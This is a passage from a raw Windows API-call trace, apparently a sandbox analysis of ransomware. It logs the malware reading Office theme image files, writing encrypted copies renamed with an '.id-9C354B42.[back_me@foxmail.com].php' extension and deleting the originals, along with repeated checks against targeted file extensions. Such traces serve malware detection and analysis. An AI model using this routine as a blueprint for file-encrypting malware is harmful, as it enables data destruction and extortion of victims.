lpString2=".PNG") returned -1 [0046.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0046.832] lstrlenW (lpString=".jpg") returned 4 [0046.832] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.832] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.832] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.833] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1453) returned 1 [0046.913] CloseHandle (hObject=0x198) returned 1 [0046.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 0x20 [0046.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.245] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.247] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0047.262] GetLastError () returned 0x0 [0047.262] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x5ad, lpOverlapped=0x0) returned 1 [0047.265] WriteFile (in: hFile=0x1b4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0047.266] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.266] WriteFile (in: hFile=0x1b4, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.266] SetEndOfFile (hFile=0x1b4) returned 1 [0047.266] CloseHandle (hObject=0x1b4) returned 1 [0047.266] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.266] SetEndOfFile (hFile=0x194) returned 1 [0047.267] CloseHandle (hObject=0x194) returned 1 [0047.267] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.267] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif")) returned 1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.268] lstrlenW (lpString=".doc") returned 4 [0047.268] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.268] lstrlenW (lpString=".docx") returned 5 [0047.268] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.268] lstrlenW (lpString=".pdf") returned 4 [0047.268] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".xls") returned 4 [0047.268] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".xlsx") returned 5 [0047.268] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.268] lstrlenW (lpString=".ppt") returned 4 [0047.268] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.268] lstrlenW (lpString=".zip") returned 4 [0047.268] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".rar") returned 4 [0047.268] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.268] lstrlenW (lpString=".bz2") returned 4 [0047.268] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.268] lstrlenW (lpString=".7z") returned 3 [0047.268] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.268] lstrlenW (lpString=".dbf") returned 4 [0047.268] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.268] lstrlenW (lpString=".1cd") returned 4 [0047.268] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.268] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.269] lstrlenW (lpString=".jpg") returned 4 [0047.269] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.269] lstrlenW (lpString=".doc") returned 4 [0047.269] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString=".docx") returned 5 [0047.269] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.269] lstrlenW (lpString=".pdf") returned 4 [0047.269] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".xls") returned 4 [0047.269] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".xlsx") returned 5 [0047.269] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.269] lstrlenW (lpString=".ppt") returned 4 [0047.269] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.269] lstrlenW (lpString=".zip") returned 4 [0047.269] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".rar") returned 4 [0047.269] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.269] lstrlenW (lpString=".bz2") returned 4 [0047.269] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString=".7z") returned 3 [0047.269] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.269] lstrlenW (lpString=".dbf") returned 4 [0047.269] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.269] lstrlenW (lpString=".1cd") returned 4 [0047.269] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.269] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 72 [0047.269] lstrlenW (lpString=".jpg") returned 4 [0047.270] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.270] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0047.270] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.762] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=33559) returned 1 [0047.762] CloseHandle (hObject=0x194) returned 1 [0047.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 0x20 [0047.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.762] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.762] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.763] GetLastError () returned 0x0 [0047.763] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x8317, lpOverlapped=0x0) returned 1 [0047.877] WriteFile (in: hFile=0x1b0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x8320, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x8320, lpOverlapped=0x0) returned 1 [0047.878] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.878] WriteFile (in: hFile=0x1b0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.878] SetEndOfFile (hFile=0x1b0) returned 1 [0047.878] CloseHandle (hObject=0x1b0) returned 1 [0047.879] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.879] SetEndOfFile (hFile=0x194) returned 1 [0047.880] CloseHandle (hObject=0x194) returned 1 [0047.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0047.880] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 1 [0047.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.880] lstrlenW (lpString=".doc") returned 4 [0047.880] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.880] lstrlenW (lpString=".docx") returned 5 [0047.880] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.880] lstrlenW (lpString=".pdf") returned 4 [0047.880] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.880] lstrlenW (lpString=".xls") returned 4 [0047.880] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.880] lstrlenW (lpString=".xlsx") returned 5 [0047.880] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.880] lstrlenW (lpString=".ppt") returned 4 [0047.880] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.881] lstrlenW (lpString=".zip") returned 4 [0047.881] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.881] lstrlenW (lpString=".rar") returned 4 [0047.881] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.881] lstrlenW (lpString=".bz2") returned 4 [0047.881] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.881] lstrlenW (lpString=".7z") returned 3 [0047.881] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.881] lstrlenW (lpString=".dbf") returned 4 [0047.881] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.881] lstrlenW (lpString=".1cd") returned 4 [0047.881] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.881] lstrlenW (lpString=".jpg") returned 4 [0047.881] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.881] lstrlenW (lpString=".doc") returned 4 [0047.881] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.881] lstrlenW (lpString=".docx") returned 5 [0047.881] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.881] lstrlenW (lpString=".pdf") returned 4 [0047.881] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.881] lstrlenW (lpString=".xls") returned 4 [0047.881] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.881] lstrlenW (lpString=".xlsx") returned 5 [0047.881] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.881] lstrlenW (lpString=".ppt") returned 4 [0047.881] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.881] lstrlenW (lpString=".zip") returned 4 [0047.881] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.882] lstrlenW (lpString=".rar") returned 4 [0047.882] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.882] lstrlenW (lpString=".bz2") returned 4 [0047.882] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.882] lstrlenW (lpString=".7z") returned 3 [0047.882] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.882] lstrlenW (lpString=".dbf") returned 4 [0047.882] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.882] lstrlenW (lpString=".1cd") returned 4 [0047.882] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0047.882] lstrlenW (lpString=".jpg") returned 4 [0047.882] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.882] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0047.882] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.882] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.882] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1439) returned 1 [0047.883] CloseHandle (hObject=0x194) returned 1 [0047.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 0x20 [0047.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.883] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.883] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.935] GetLastError () returned 0x0 [0047.935] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x59f, lpOverlapped=0x0) returned 1 [0048.097] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x5a0, lpOverlapped=0x0) returned 1 [0048.098] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.098] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.098] SetEndOfFile (hFile=0x20c) returned 1 [0048.098] CloseHandle (hObject=0x20c) returned 1 [0048.098] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.098] SetEndOfFile (hFile=0x194) returned 1 [0048.099] CloseHandle (hObject=0x194) returned 1 [0048.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0048.099] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 1 [0048.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.099] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.099] lstrlenW (lpString=".doc") returned 4 [0048.099] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.100] lstrlenW (lpString=".docx") returned 5 [0048.100] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.100] lstrlenW (lpString=".pdf") returned 4 [0048.100] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.100] lstrlenW (lpString=".xls") returned 4 [0048.100] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.100] lstrlenW (lpString=".xlsx") returned 5 [0048.100] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.100] lstrlenW (lpString=".ppt") returned 4 [0048.100] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.100] lstrlenW (lpString=".zip") returned 4 [0048.100] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.100] lstrlenW (lpString=".rar") returned 4 [0048.100] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.100] lstrlenW (lpString=".bz2") returned 4 [0048.100] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.100] lstrlenW (lpString=".7z") returned 3 [0048.100] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.100] lstrlenW (lpString=".dbf") returned 4 [0048.100] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.100] lstrlenW (lpString=".1cd") returned 4 [0048.100] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.100] lstrlenW (lpString=".jpg") returned 4 [0048.100] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.100] lstrlenW (lpString=".doc") returned 4 [0048.101] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.101] lstrlenW (lpString=".docx") returned 5 [0048.101] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.101] lstrlenW (lpString=".pdf") returned 4 [0048.101] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.101] lstrlenW (lpString=".xls") returned 4 [0048.101] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.101] lstrlenW (lpString=".xlsx") returned 5 [0048.101] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.101] lstrlenW (lpString=".ppt") returned 4 [0048.101] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.101] lstrlenW (lpString=".zip") returned 4 [0048.101] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.101] lstrlenW (lpString=".rar") returned 4 [0048.101] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.101] lstrlenW (lpString=".bz2") returned 4 [0048.101] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.101] lstrlenW (lpString=".7z") returned 3 [0048.101] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.101] lstrlenW (lpString=".dbf") returned 4 [0048.101] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.101] lstrlenW (lpString=".1cd") returned 4 [0048.101] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0048.101] lstrlenW (lpString=".jpg") returned 4 [0048.101] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.102] 